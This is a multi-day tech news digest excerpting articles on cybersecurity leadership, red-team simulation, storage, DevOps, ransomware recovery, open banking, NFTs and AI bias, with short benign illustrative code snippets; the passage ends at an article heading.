Daily Tech Digest - August 24, 2021

The CISO in 2021: coping with the not-so-calm after the storm

Naturally, the challenges facing the modern CISO are not focused on one front. Those on the receiving end of cyber attacks are of just as much concern as those behind them. More than half believe that users are the most significant risk facing their organisation. And just like the threats from the outside, there are several causing concern from within. Human error, criminal insider attacks and employees falling victim to phishing emails are just some of the issues keeping CISOs up at night. With many users now out of sight, working remotely, at least some of the time, these concerns are more pressing than they may once have been. Nearly half of UK CISOs believe that remote working increases the risk facing their organisation. And it’s easy to see why. Non-corporate environments tend to make us more prone to errors and misjudgement, and in turn, more vulnerable to cyber attack. Working from home also calls for slight alterations to security best practice. The use of personal networks and devices may require increased protocols and protections.


How do I select an automated red teaming solution for my business?

There are, however, tools that can help train defenders or aid in discovering gaps in defensive investment. There are three initial considerations for these tools. First, for the best defenders, identifying behavior, not static signatures or tools, is crucial. By correlating events and telemetry, they can spot new or unknown tools and react faster. To exercise this, the simulation tool must run complex chains of techniques based on the environment; checking the OS, downloading an implant, establishing persistence, then searching local files before moving laterally, for example. Secondly, the solution’s techniques must be relevant, based on up-to-date imitations of those observed from real actors. Use of threat intelligence benchmarks defenders against genuine attackers instead of generic, outdated threats, decreasing the likelihood of defensive gaps. Finally, getting metrics on the performance of the current defensive set-up requires the solution to integrate with the SIEM. Without this, gathering evidence of MITRE-mapped controls failing becomes cumbersome and error-prone.
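
As a purely illustrative sketch of what such a chained simulation might look like, the snippet below strings together stubbed stages in the order the excerpt describes. The stage names, ordering and logging are assumptions rather than any vendor's playbook; each function only logs what a real breach-and-attack simulation agent would attempt, and the chain stops wherever a defensive control would have blocked a step.

```python
# Hedged sketch of a chained technique simulation: benign stubs only.
import logging, platform

logging.basicConfig(level=logging.INFO, format="%(message)s")

def check_os() -> bool:
    logging.info(f"[recon] target OS: {platform.system()}")
    return True

def stage_implant() -> bool:
    logging.info("[delivery] would stage a benign test implant here")
    return True

def establish_persistence() -> bool:
    logging.info("[persistence] would register a benign autorun marker here")
    return True

def search_local_files() -> bool:
    logging.info("[collection] would enumerate decoy files here")
    return True

def move_laterally() -> bool:
    logging.info("[lateral-movement] would attempt a connection to a lab host here")
    return True

CHAIN = [check_os, stage_implant, establish_persistence, search_local_files, move_laterally]

for step in CHAIN:
    if not step():  # stop the chain if a defensive control blocks a step
        logging.info(f"chain blocked at {step.__name__}; defenders should see an alert trail")
        break
```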


What Enterprises Can Learn from Digital Disruption

Operating in today's climate means updating mindsets, processes, budgeting cycles, incentive systems and traditional ways of working. It's not about ping pong tables and arcade rooms. It's being better at delivering on core competencies than competitors and having the digital savviness required to succeed in a digital-first world. However, the most valuable trait is curiosity because curiosity leads to experimentation, innovation, optimization, and learning. “Disruptors face the challenge of explaining the concept and the benefits of the new approach. Many organizations struggle to grasp it and operate under the inertia of business as usual,” says Greg Brady, founder and chairman of supply chain control tower provider One Network Enterprises. “The COVID-19 pandemic has opened the eyes of many executives to the shortcomings of the old way of doing business.” Some organizations attempt to mimic what the digital disrupters do. However, their success tends to depend on the context in which the concept was executed.


Break the Cycle of Yesterday's Logic in Organizational Change and Agile Adoption

Like Tibetan prayer wheels, each framework promises to be the best agent of business change, provided one follows its particular consultancy. Swayed by the marketing machinery, executives and senior managers pick one of them, hoping it will suit them, instead of looking to their inner and outer organizational opportunities and boundaries to find genuinely value-adding outcomes for their business. These artificial dual operating systems get designed alongside the line organisations, with their job descriptions, hierarchies, performance contracts, engineering models and cultural values. Hurdles are preprogrammed, because for many technically driven enterprises, industrial standards simply don’t scale with agile frameworks. A logical inference is that the necessary variety is largely lost, and operationalizing that variety at minimal investment cost is blocked. Consequently, the change system behaves like dandelion seeds: the change takes time, costs spread, and development transaction costs increase.


How to choose the best NVMe storage array

NVMe’s parallelism is fundamental to its value. Where SAS-based storage supports a single message queue and 256 simultaneous commands per queue, NVMe ramps this all the way up to 64,000 queues, each with support for 64,000 simultaneous commands. That massive increase is key to enabling you to ramp up the number of VMs on a single physical host, driving greater efficiency and easing management. Identifying individual workloads and planning for growth over time, along with high availability needs and continuity requirements (backup/restore, replication, geo-redundancy, or simply disaster recovery), can help paint a picture of what you need in an NVMe array. While each of these considerations has the potential to drive up the initial cost of whichever NVMe array you select (or multiple arrays, when you consider redundancy), smart investments that match your needs ultimately reduce your cost of ownership in the long run. NVMe arrays are big-ticket items, so efficient storage practices are critical to making the most of the hardware you buy and extending the lifecycle of your storage media.
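
To make the "planning for growth" point concrete, here is a minimal back-of-the-envelope sketch of how workload growth, redundancy copies and usable-capacity overhead translate into the raw capacity an array purchase has to cover. All figures, the replica count and the usable ratio are illustrative assumptions, not vendor guidance.

```python
# Rough capacity planning sketch for an NVMe array purchase (illustrative numbers only).

def required_raw_capacity_tb(current_tb: float,
                             annual_growth: float,
                             years: int,
                             replicas: int = 2,
                             usable_ratio: float = 0.7) -> float:
    """Estimate raw TB to buy so the array lasts `years` at `annual_growth`."""
    projected = current_tb * (1 + annual_growth) ** years  # workload growth
    with_redundancy = projected * replicas                  # replication / HA copies
    return with_redundancy / usable_ratio                   # formatting, spare and metadata overhead

print(f"{required_raw_capacity_tb(100, 0.30, 3):.0f} TB raw")  # ~628 TB raw for 100 TB today
```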


Progressive Delivery: A Detailed Overview

In a traditional waterfall model, teams release new features to an entire user base at one time. Using progressive delivery, you roll out features gradually. Here’s how it works: DevOps managers first ship a new feature to release managers for internal testing. Once that’s done, the feature goes to a small batch of users to collect additional feedback, or is incrementally released to more users over time. The final step is a general launch when the feature is ready for the masses. It’s a bit like dipping your toes into the water before diving in. If something goes wrong during a launch, you haven’t exposed your entire user base to it. You can easily roll the feature back if you need to and make changes. Progressive delivery emerged in response to widespread dissatisfaction with the continuous delivery model. DevOps teams needed a way to control software releases and catch issues early on instead of pumping out bug-filled versions to their users, and progressive delivery met this requirement.
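
One common way to implement the gradual rollout described above is a percentage-based feature flag: each user is deterministically assigned to a bucket, and the feature turns on once the rollout percentage covers that bucket. The sketch below is a minimal illustration; the feature name, user id and stage thresholds are assumptions, not taken from the article.

```python
# Minimal sketch of percentage-based progressive rollout with stable user bucketing.
import hashlib

def feature_enabled(feature: str, user_id: str, rollout_percent: int) -> bool:
    digest = hashlib.sha256(f"{feature}:{user_id}".encode()).hexdigest()
    bucket = int(digest, 16) % 100          # stable bucket in [0, 100)
    return bucket < rollout_percent         # e.g. 5 covers roughly 5% of users

# Staged rollout: a tiny slice first, then 5%, 25%, and finally everyone.
for stage in (1, 5, 25, 100):
    enabled = feature_enabled("new-checkout", "user-42", stage)
    print(f"rollout {stage:3d}% -> user-42 enabled: {enabled}")
```

Because the bucket is derived from a hash of the feature and user id, the same users stay enabled as the percentage grows, which makes rollback and comparison between cohorts straightforward.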


Employees Can Be Insider Threats to Cybersecurity. Here's How to Protect Your Organization.

Politics are another strong motivation for employees to become insider threats. For example, an employee might be upset with his or her work situation or job title but can't see a way to fix it because of inter-office politics. This could lead to that employee becoming disgruntled and wanting to take revenge on the company. This situation is common in enterprise-level organizations, where management doesn't take the time to get to know their employees or address their concerns. Providing an environment where employees can reach their full potential and have open lines of communication with their chain of command can help mitigate potential political concerns. This ties closely to professional reasons. For example, employees might feel slighted after being passed over for a promotion, or they might be the target of an internal investigation for misconduct. On the other hand, they could find themselves the target of misconduct by a peer or boss, which could lead them to take matters into their own hands. Humans are emotional creatures, and this, of course, applies to employees as well. 


Three reasons why ransomware recovery requires packet data

SecOps team members or external consultants can comb through the data to find the original malware that caused the attack, determine how it got onto the network in the first place, map how it traversed the network and determine which systems and data were exposed. Note that the storage capacity required to store even a week’s worth of packet data can quickly become prohibitively expensive for high-speed networks. To have a realistic chance of storing a large enough buffer, these organizations will need to be smart about where to capture and how much to capture. One way to do this is to use intelligent packet filtering and deduplication by front-ending the packet capture devices with a packet broker to reduce the amount of data saved. Another method is using integrations between the security tools and the capture devices to only capture packet data correlated with incidents or high alerts. Using a rolling buffer strategy to overwrite the data after a “safe period” has passed will also reduce storage requirements. 
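
The storage-cost warning is easy to quantify. The sketch below is a back-of-the-envelope estimate, with illustrative inputs, of how much a one-week rolling buffer of full packet capture costs in storage before filtering, deduplication or a packet broker reduces the volume.

```python
# Back-of-the-envelope sketch: storage needed for a rolling packet-capture buffer.

def capture_storage_tb(link_gbps: float, utilisation: float, days: float) -> float:
    bytes_per_sec = link_gbps * 1e9 / 8 * utilisation   # bits/s -> bytes/s at average load
    total_bytes = bytes_per_sec * days * 24 * 3600
    return total_bytes / 1e12                            # terabytes

# A 10 Gbps link at 40% average utilisation, one-week buffer:
print(f"{capture_storage_tb(10, 0.4, 7):.0f} TB")  # ~302 TB before dedup/filtering
```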


The key to mobile security? Be smarter than your device

What people often forget is that the shiny all-singing, all-dancing device in their pocket is also a highly capable surveillance device, boasting advanced sensory equipment (camera and microphone), and a wealth of tracking information. People just assume that their mobile device is secure and often use it with less care (from a security point of view) for things that they wouldn’t do on a laptop. To this end, we now have a vast industry that sets out to secure and empower productivity on the basis that people can work anywhere and often use their devices for both work and personal use. Mobility and cloud technology have become essential with most people now working and managing their personal lives in a digital fashion. To borrow a saying from the world of Spider-Man (slightly out of context) — with great power comes great responsibility. We now live in a world where the once humble communication device is a very powerful tool that needs to be used responsibly in the face of those wishing to act in a nefarious way.


How to Develop a Data-Literate Workforce

You probably already know the importance of data literacy, but to frame this article, let's position the benefits in a modern data governance setting. The best way to do so is to use an example where the absence of data literacy led to disastrous consequences. There are many well-known examples of data literacy issues leading to extreme failures. However, one of the most significant occurred at NASA in 1999 and led to the loss of a $125 million Mars probe. The probe burnt up as it descended through the Martian atmosphere because of a mathematical error caused by conflicting definitions. The navigation team at NASA's Jet Propulsion Laboratory (JPL) worked in the metric system (meters and millimeters), while Lockheed Martin Astronautics, the company responsible for designing and building the probe, provided the navigation team with acceleration data in imperial measurements (feet, pounds, and inches). Because there were no common terms or definitions in place, the JPL team read the data inaccurately and failed to quantify the speed at which the craft was accelerating. The result was catastrophic, but it could have been easily avoided if a system of data literacy had been in place.
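
As a small illustration of the underlying failure mode (not NASA's actual software), the widely reported mismatch involved thruster impulse delivered in pound-force seconds while the ground system expected newton seconds. Carrying an explicit unit tag with every value turns that kind of silent mix-up into a loud error, which is the technical side of what shared definitions buy you.

```python
# Illustrative sketch: tagging values with units so a metric/imperial mismatch fails loudly.

CONVERSIONS = {("lbf*s", "N*s"): 4.44822}  # pound-force seconds -> newton seconds

def to_si(value: float, unit: str, target: str = "N*s") -> float:
    if unit == target:
        return value
    try:
        return value * CONVERSIONS[(unit, target)]
    except KeyError:
        raise ValueError(f"no conversion from {unit} to {target}")

supplier_value = 1.5                      # delivered in lbf*s, as in the Mars probe story
print(to_si(supplier_value, "lbf*s"))     # ~6.67 N*s (converted, not silently misread)
# to_si(supplier_value, "furlongs")       # would raise instead of corrupting navigation data
```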



Quote for the day:

"The first key to leadership is self-control" -- Jack Weatherford

Daily Tech Digest - August 23, 2021

Is this the end of the Point of Sale (PoS)?

The best part of all about this, in my opinion, is the further digital acceleration it affords us. It allows you to retire old equipment that’s often temperamental; you get to integrate quicker; and you get to deliver new digital interactions far quicker than waiting for a PoS integration team. Testing becomes simplified, and all devices become commodity mobile phones and tablets. The icing on the cake is that the barrier for entry is incredibly low; you can integrate with a payment system for next to no cost, and being a service provider, they’ve made it as simple as possible. The integration of an app-based PoS into an app ecosystem allows for a single, seamless journey that’s personal to the customer, empowering, and overall just a better experience for many users. However, one of the hurdles to get over is the level of app installation fatigue, as not everybody wants an app per place they visit. This is a huge opportunity for Uber equivalents to come in and provide a unified platform (which is working well for things like food delivery), as mobile-first web apps aren’t always a very slick experience.


World Bank Launches Global Cybersecurity Fund

The new cybersecurity initiative aims to accelerate digital transformation by improving governments' technical capabilities and their efforts to increase security awareness. A spokesperson for the World Bank tells Information Security Media Group that associated funds will be disbursed "using diverse implementation models" to catalyze specific cybersecurity investments. The amount of funding to be provided was not revealed. The bank calls particular attention to security investments that improve critical infrastructure - including the energy, transportation, finance and healthcare sectors. "These systems [designed prior to, or during the early years of the digital revolution] … are today highly vulnerable to cybersecurity attacks with possibly serious outcomes," the bank says on the fund's dedicated webpage. The World Bank spokesperson says its new funding can help improve cybersecurity awareness at the national level and enable governments to identify risks, fund technical solutions and prepare for infrastructure investments.


How attackers could exploit breached T-Mobile user data

T-Mobile is offering all impacted customers a free two-year subscription for McAfee's ID Theft Protection Service, which includes credit monitoring, full-service identity restoration, identity insurance, dark web monitoring, and more. Business and postpaid customers can also enable T-Mobile's Account Takeover Protection service for free, and all T-Mobile users can use the company's Scam Shield app that enables caller ID and automatically blocks calls flagged as scams. More generally, all mobile subscribers should check with their carriers what options they have to secure their accounts against SIM swapping or number porting, and they should enable that additional verification. Using text messages or phone calls for two-factor authentication should be disabled where possible in favor of two-factor authentication via a mobile app or a dedicated hardware token, especially for high-value accounts. Email accounts are high-value accounts because they are used to confirm password reset requests for most other online accounts. Finally, be wary of email or text messages that ask for sensitive information such as passwords, PINs, access tokens, or that direct you to websites that ask for such information.
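
For readers wondering what "app-based" two-factor authentication means in practice, the time-based one-time password (TOTP) scheme used by most authenticator apps is straightforward to demonstrate. The sketch below uses the pyotp library; the secret handling is simplified for illustration and in a real service the secret would be provisioned once and stored securely.

```python
# Hedged sketch of app-based 2FA (TOTP), the kind recommended over SMS codes.
import pyotp

secret = pyotp.random_base32()   # provisioned once; shared with the user's authenticator app
totp = pyotp.TOTP(secret)

code_from_user = totp.now()      # in reality, typed in from the phone app
print(totp.verify(code_from_user))   # True if the 6-digit code matches the current time window
```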


Open Banking Transforming Business Models Forever

The potential to use APIs to broaden relationships and improve the customer experience has exploded over the past decade, with platform organizations such as Apple, Google, Amazon, Uber and Facebook using the model to grow exponentially and grab significant market share from established firms, including banks and credit unions. But you don’t have to be a tech giant to benefit from APIs — the opportunity is being leveraged in virtually every industry and by organizations of all sizes. In fact, small and midsize financial institutions that want to reach digital audiences beyond their existing geography or traditional product set can leverage open APIs. The options include creating an independent platform, partnering to jointly create a platform, or becoming part of another platform’s ecosystem. And there are many third-party solution providers who are willing to assist. According to the Harvard Business Review, “Smaller firms could have an agility advantage by unbundling their capabilities, designing for their consumers, and exploiting opportunities in their respective ecosystems.”


10 Tips to Overcome Obstacles of AI-Enabled Digital Transformation

The bottom line: don’t add too many unknowns to your transformation program. AI projects require iterative testing and evolution of supporting processes and clean, consistent, well-architected data is the price of admission. Don’t assume that the data is in place and usable for the target process, and don’t take the promises of vendors or status of program leaders far removed from the front lines as reality. The best way to determine whether supporting processes and data are at the level required for success is through competitive benchmarking, internal benchmarking, heuristic evaluations, and maturity assessments. You need objective metrics to know if your data is adequate. A heuristic (collection of best practices and rules of thumb) evaluation can provide a snapshot of how well the organization is doing on current efforts. What does the organization have to work with? Are foundational processes and data quality strong? Or does strengthening the foundation require significant time and effort? A maturity assessment cuts across multiple dimensions that may appear beyond the scope of the domain but would impact downstream processes for a given area.


Defence in Depth – Time to start thinking outside the box

By embedding another link within an article that was itself linked to from an email, the attacker lured the recipient into clicking a bad link and bypassed the normal scanning tools. This illustrates that even with anti-phishing in place, defences can still be breached. So, what could have been done to prevent this? Firstly, you might be asking why the IPS solution didn’t prevent this in the first place. Normally, it would; however, these days, we are mostly at home, so the average home router does not have this functionality and people are not always connected to a VPN. To analyse what went wrong, and to prevent further attacks, we first checked the cyber-attack chain, or the MITRE ATT&CK framework. This is a globally accessible knowledge base of adversary tactics and techniques based on real-world observations. This helped us to understand how an attacker had bypassed the previous measures. When we dug deeper, we saw there had been a successful Defence Evasion; the email solution was exploited by allowing a phishing email through. This could have easily led to Credential Access or Installation with further persistence.


Counterintuitive Strategies for the Digital Economy

The most common explanations include running out of capital, underestimating the competition, or overinvesting in the product. “Many companies think ‘if I add in another feature I’ll grow,’ but companies which are more focused on the fit and how to address it to the buyer tend to do better,” said Finkeldey. Other reasons to fail include incorrect go-to-market business models, a lack of business model fit, and poor marketing. This last one was an interesting inclusion and was backed up with some Gartner research. Often, marketing, brand building, and thought leadership can be seen as luxuries, but they are key to opening up new markets and achieving growth and success. Finkeldey’s Gartner colleague Alastair Woolcock pointed out that around 47% of the operational spend could be on sales and marketing among successful companies in the SaaS space. For those spending much less than that, say up to 15%, just increasing it by 5% or 10% was not the answer. “Stepping in half the way only gets them half the way,” said Woolcock. So, while the temptation is to “run and hire a bunch of sellers,” outsourcing this function was often misplaced investment in the current market.


Why automated pentesting won’t fix the cybersecurity skills gap

Security teams need to have the adversarial or hacker mindset – i.e., they have to think as an attacker. They need to stay a step ahead of the cyber criminals and advise the rest of the organization on the important and timely actions to take. Not every vulnerability is obvious. The best way to defend the enterprise is for defenders to think like attackers and try harder every time they seemingly hit a dead-end – not giving up easily on something they see that doesn’t make sense. Successfully defending systems, networks, and applications requires not only an understanding of the tools an attacker could use, but how they use them and when they use them. This requires a lot of judgement calls, asking a lot of questions that start with “why”, and those cannot be accomplished with automated tests. Automated tests are only as good as what you tell them to look for and do. What makes security hard is that each time, the attacker is doing something different and new. Attackers don’t need a massive vulnerability to impact organizations – they are patient, waiting for an individual to make a mistake to let them in, either via phishing or social engineering.


Hackers are getting better at their jobs, but people are getting better at prevention

One of the other issues, though, that you should realize is that even if there is going to be federal legislation, it's only going to make a difference if it overrides and preempts state laws, and the states do not want that to happen. The states want to protect their own people, and any law that would be adopted on the federal level would be unlikely to be as comprehensive as some of the state laws. But in any case, I'll tell you that in order to comply with these laws, any one of them, California for example, requires a great deal of work. It requires an understanding of all the data you collect, who has access to that data, where it's stored, who uses that data, who in your supply chain is involved in that project. And that is a very, very big endeavor. Now, it's a very valuable endeavor because a company that understands its collection and use of data is going to understand its business much, much better. I've actually seen companies that go through that process and realize that they can improve their businesses, but it's like going on a diet and working out. 


Top 6 Time Wastes as a Software Engineer

There's a delicate balance that you have to take care of while choosing between automation and manual testing. So let's understand how you, as a software engineer, can use this to work out an efficient testing strategy. It's easy to write a small manual test to ensure that the new feature you added is working fine. But when you scale, running those manual tests needs more hours off the clock, especially when you're trying to find that pesky bug that keeps breaking your code. If your application or website has many components, the chances of you not running a specific test by mistake also increase. Automated tests, or even a system to run tests more efficiently, help avoid this. You would need to spend a bit more time setting up your automated tests. Once they are written, though, they can be reused and triggered as soon as you make any code changes. So you don't have to manually re-test previous functions just because you added a new one. Conversely, choosing the right tasks to automate is just as important. Unfortunately, it is one of the most common mistakes of QA automation testing. It's tempting to fall into the trap of over-automating things and to end up replicating tests script-by-script.
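
To illustrate the point about reuse, here is what turning a manual spot-check into an automated regression test can look like in pytest style. The `apply_discount` function is a hypothetical stand-in for the new feature under test, not code from the article.

```python
# Minimal sketch: a manual check rewritten as automated regression tests (pytest-style).
import pytest

def apply_discount(price: float, percent: float) -> float:
    """Hypothetical feature under test: apply a percentage discount to a price."""
    if not 0 <= percent <= 100:
        raise ValueError("percent must be between 0 and 100")
    return round(price * (1 - percent / 100), 2)

def test_discount_applied():
    assert apply_discount(200.0, 10) == 180.0

def test_invalid_percentage_rejected():
    with pytest.raises(ValueError):
        apply_discount(200.0, 150)
```

Once written, these run on every code change, so earlier behaviour is re-verified without anyone spending hours off the clock repeating the same checks by hand.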



Quote for the day:

"Successful leadership requires positive self-regard fused with optimism about a desired outcome." -- Warren Bennis

Daily Tech Digest - August 22, 2021

Move Fast Without Breaking Things in ML

The first step in the response to the problem has happened even before you got invited to the call with your CTO: the problem has been discovered and the relevant people have been alerted. This is likely the result of a metric monitoring system that is responsible for ensuring important business metrics don’t go off track. Next, using your ML observability tooling, which we will talk a bit more about in a second, you are able to determine that the problem is happening in your search model, since the proportion of users who are engaging with your top-n links returned has dropped significantly. After learning this, you rely on your model management system to either roll back to your previous search ranking model or deploy a naive model that can hold you over in the interim. This mitigation is what stops your company from losing (as much) money every minute, since every second counts while users are being served incorrect products. Now that things are somewhat working again, you need to look back to your model observability tools to understand what happened with your model.
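
As a rough illustration of the kind of metric monitor that would have paged the team, the sketch below compares the current engagement rate for the search model against a trailing baseline and alerts on a large relative drop. The metric name, values and threshold are assumptions made up for the example.

```python
# Illustrative metric-drop detector of the kind a monitoring system might run.

def engagement_drop_alert(history: list[float], current: float,
                          max_drop: float = 0.25) -> bool:
    baseline = sum(history) / len(history)
    drop = (baseline - current) / baseline
    return drop > max_drop                 # e.g. more than 25% below the trailing average

recent_days = [0.41, 0.39, 0.42, 0.40, 0.43]   # fraction of users clicking a top-n link
print(engagement_drop_alert(recent_days, 0.27))  # True -> trigger rollback / investigation
```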


Ransomware is the top cybersecurity threat we face, warns cyber chief

Not only are cyber-criminal ransomware groups encrypting networks and demanding a significant payment in exchange for the decryption key, now it's common for them to also steal sensitive information and threaten to release it unless a ransom is paid – often leading victims to feel as if they have no choice but to give in to the extortion demands. "As the business model has become more and more successful, with these groups securing significant ransom payments from large profitable businesses who cannot afford to lose their data to encryption or to suffer the down time while their services are offline, the market for ransomware has become increasingly professional," Cameron will say. Ransomware is successful because it works; in many cases, because organisations still don't have the appropriate cyber defences in place to prevent cyber criminals infiltrating their network in the first place in what the NCSC CEO describes as "the cumulative effect of a failure to manage cyber risk and the failure to take the threat of cyber criminality seriously".


Become software engineers, not software integrators.

Ever since its inception, the IT industry has been evolving every day, delivering better and richer technology experiences to end-users. At the same time, the industry has also continually focused on reducing development time and cycles for software engineering teams. A significant portion of IT engineers and organizations are motivated to ease the development process. This in turn has become a race to give the best technologies (frameworks, tools, etc.) to engineering teams. In this race, the focus has gradually shifted from “ease of development” to almost “no development at all”, i.e. making tools that allow engineers to simply integrate components to produce the final product. Essentially, plug and play. Of course, this brings big advantages: companies building software for businesses can focus more on business ideas, and with a reduced development cycle they can build many more software products. However, the concern starts when engineers who get used to plug-and-play tools start losing core engineering skills like optimizing, maturing, and architecting the code.


How External IT Providers Can Adopt DevOps Practices

The key is to overcome waterfall thinking. A modern supplier will work in small batches and will use an experimental approach to product development. The supplier’s product development team will create hypotheses and validate them with small product increments, ideally in production. According to my experience, many IT suppliers use agile software development and Continuous Integration these days. But they stop their iterative approach at the boundary to production. One problem of having separated silos for development and operations is that in most cases these two silos have different goals (dev = throughput, ops = stability), Diener mentioned. In contrast, a DevOps team has a common business goal. ... In order to adopt DevOps practices, the supplier has to find out what his client’s goal is. It has to become the supplier’s goal as well. We at cosee use product vision workshops to shape and document the client’s goal (impact) and its users’ needs (outcome). That’s a prerequisite for an iterative and experimental product development approach.


Blockchain in Space: What’s Going on 4 Years After the First Bitcoin Transaction in Orbit?

The growth in both scale and affordability of space exploration is creating a whole new sector — the Space Economy, as the United Nations Office for Outer Space Affairs already calls it. An inevitable question then arises: what money will the players in this space economy use? ... Despite all the advances, space exploration often remains a costly business, both in money and science capital. Because of that high cost nature, any large project in space requires the cooperation of numerous private companies, each providing resources and talent. And the most ambitious programs are collaborations between governments — not all of which necessarily put a lot of trust in each other. This is where one of blockchain’s key advantages comes in: it enables the exchange of value and data between independent parties in a way that doesn’t involve trust. With smart contracts, peer-to-peer transaction settlement, and the transparency and accountability enabled by public blockchain records


Upcoming Trends in DevOps and SRE in 2021

Service meshes are quickly becoming an essential part of the cloud-native stack. A large cloud application may require hundreds of microservices and serve a million users concurrently. A service mesh is a low-latency infrastructure layer that allows high-traffic communication between different components of a cloud application (databases, frontends, etc.). This is done via application programming interfaces (APIs). Most distributed applications today have a load balancer that directs traffic; however, most load balancers are not equipped to deal with a large number of dynamic services whose locations/counts vary over time. To ensure that large volumes of data are sent to the correct endpoint, we need tools that are more intelligent than traditional load balancers. This is where Service Meshes come into the picture. In typical microservice applications, the load balancer or firewall is programmed with static rules. However, as the number of microservices increases and the architecture changes dynamically, these rules are no longer enough.
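
The contrast between static rules and dynamic services can be shown with a toy example. The sketch below models the registry-driven routing that a mesh's data plane automates: instances are looked up at request time, so a replica added by an autoscaler is routable without anyone editing a rule. The registry, service names and addresses are all illustrative assumptions, not a real mesh API.

```python
# Conceptual sketch: routing against a live service registry instead of static rules.
import random

registry: dict[str, list[str]] = {
    "frontend": ["10.0.1.5:8080", "10.0.1.9:8080"],
    "orders":   ["10.0.2.3:9000"],
}

def route(service: str) -> str:
    """Pick a currently registered instance (simple client-side load balancing)."""
    instances = registry.get(service)
    if not instances:
        raise LookupError(f"no healthy instances of {service}")
    return random.choice(instances)

registry["orders"].append("10.0.2.7:9000")   # an autoscaler adds a replica at runtime
print(route("orders"))                        # the new instance is routable with no rule change
```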


How GPT-3 and Artificial Intelligence Will Destroy the Internet

As a natural language processor and generator, GPT-3 is a language learning engine that crawls existing content and code to learn patterns, recognize syntax and produce unique outputs based on prompts, questions and other inputs. But GPT-3 is useful for more than just content marketers, as witnessed by the recent OpenAI partnership with GitHub for creating code using a tool dubbed “Copilot.” The ability to use autoregressive language modeling doesn’t just apply to human language, but also to various types of code. The outputs are currently limited, but their future potential use could be vast and far-reaching. How is GPT-3 currently kept at bay? With current beta access to the OpenAI API, we developed our own tool on top of the API. The current application and submission process with OpenAI is stringent. Once an application has been developed, and before it can be released to the public for use in any commercial application, OpenAI requires a detailed submission and use case for approval by the OpenAI team.


NFTs, explained

“Non-fungible” more or less means that it’s unique and can’t be replaced with something else. For example, a bitcoin is fungible — trade one for another bitcoin, and you’ll have exactly the same thing. A one-of-a-kind trading card, however, is non-fungible. If you traded it for a different card, you’d have something completely different. You gave up a Squirtle, and got a 1909 T206 Honus Wagner, which StadiumTalk calls “the Mona Lisa of baseball cards.” (I’ll take their word for it.) At a very high level, most NFTs are part of the Ethereum blockchain. Ethereum is a cryptocurrency, like bitcoin or dogecoin, but its blockchain also supports these NFTs, which store extra information that makes them work differently from, say, an ETH coin. It is worth noting that other blockchains can implement their own versions of NFTs. (Some already have.) NFTs can really be anything digital (such as drawings, music, your brain downloaded and turned into an AI), but a lot of the current excitement is around using the tech to sell digital art.


Demystifying AI: The prejudices of Artificial Intelligence (and human beings)

In a way, the results of these algorithms hold a mirror to human society. They reflect and perhaps even amplify the issues already present. We know that these algorithms need data to learn. Their predictions are only as good as the data they are trained on and the goal they are set to achieve. The data needed to train these algorithms is huge (think millions and above). Suppose we are trying to develop an algorithm to identify cats and dogs from pictures. Not only do we need thousands of pictures of cats and dogs, but they should be labeled (say the cat is class 0 and dog is class 1) so that the algorithm can understand. We can download these images off the internet (the ethics of which is questionable), but still, they need to be labeled manually. Now, consider the complexity and effort required to correctly label a million images in one thousand classes. Often this labeling task is done by “cheap labor” who may or may not have the motivation to do it correctly, or they simply make mistakes. Another problem in the data set is that of class imbalance. 
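
One common mitigation for the class-imbalance problem mentioned above is to weight classes inversely to their frequency during training, so that errors on the rare class cost more. The toy figures below are illustrative; the formula mirrors the standard "balanced" class-weight heuristic.

```python
# Small sketch of class weighting as one response to class imbalance.
from collections import Counter

labels = [0] * 950 + [1] * 50      # 0 = cat, 1 = dog; a heavily imbalanced toy data set

counts = Counter(labels)
total = len(labels)
weights = {cls: total / (len(counts) * n) for cls, n in counts.items()}
print(weights)   # {0: ~0.53, 1: 10.0} -> mistakes on the rare class are penalised far more
```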


Three Mistakes That Will Ruin Your Multi-Cloud Project (and How to Avoid Them)

A multi-cloud strategy only augments the likelihood of experiencing one of these errors. The complexity of multiple clouds provides an extended attack surface for threat actors. An increased number of services means a higher chance of experiencing a misconfiguration or data leak. Centralized visibility and management are necessary to combat risk and ensure protection and compliance across multi-cloud environments. Proper governance requires a full view of the cloud, complete with resource consumption, how new services are accessed, and systems in place for risk mitigation, including data and privacy policies and processes. Rather than a cyclically executed process, risk management must be continuous and contain various coordinated actions and tasks in order to oversee and manage risks. An ecosystem-wide framework going beyond traditional IT is necessary for proper risk management. Enterprises must therefore prioritize training and awareness within their organization, teaching team members how to securely use multiple cloud services. 



Quote for the day:

"Integrity is the soul of leadership! Trust is the engine of leadership!" -- Amine A. Ayad

Daily Tech Digest - August 21, 2021

Can AGI take the next step toward genuine intelligence?

To take the next step on the road to genuine intelligence, AGI needs to create its underpinnings by emulating the capabilities of a three-year-old. Take a look at how a three-year-old playing with blocks learns. Using multiple senses and interaction with objects over time, the child learns that blocks are solid and can’t move through each other, that if the blocks are stacked too high they will fall over, that round blocks roll and square blocks don’t, and so on. A three-year-old, of course, has an advantage over AI in that he or she learns everything in the context of everything else. Today’s AI has no context. Images of blocks are just different arrangements of pixels. Neither image-based AI (think facial recognition) nor word-based AI (like Alexa) has the context of a “thing” like the child’s block which exists in reality, is more-or-less permanent, and is susceptible to basic laws of physics. This kind of low-level logic and common sense in the human brain is not completely understood but human intelligence develops within the context of human goals, emotions, and instincts. Humanlike goals and instincts would not form the best basis for AGI.


How to take advantage of Android 12’s new privacy options

First and foremost in the Android 12 privacy lineup is Google’s shiny new Privacy Dashboard. It’s essentially a streamlined command center that lets you see how different apps are accessing data on your device so you can clamp down on that access as needed. ... Next on the Android 12 privacy list is a feature you’ll occasionally see on your screen but whose message might not always be obvious. Whenever an app is accessing your phone’s camera or microphone — even if only in the background — Android 12 will place an indicator in the upper-right corner of your screen to alert you. When the indicator first appears, it shows an icon that corresponds with the exact manner of access. But that icon remains visible only for a second or so, after which point the indicator changes to a tiny green dot. So how can you know what’s being accessed and which app is responsible? The secret is in the swipe down: Anytime you see a green dot in the corner of your screen, swipe down once from the top of the display. The dot will expand back to that full icon, and you can then tap it to see exactly what’s involved.


Achieving Harmonious Orchestration with Microservices

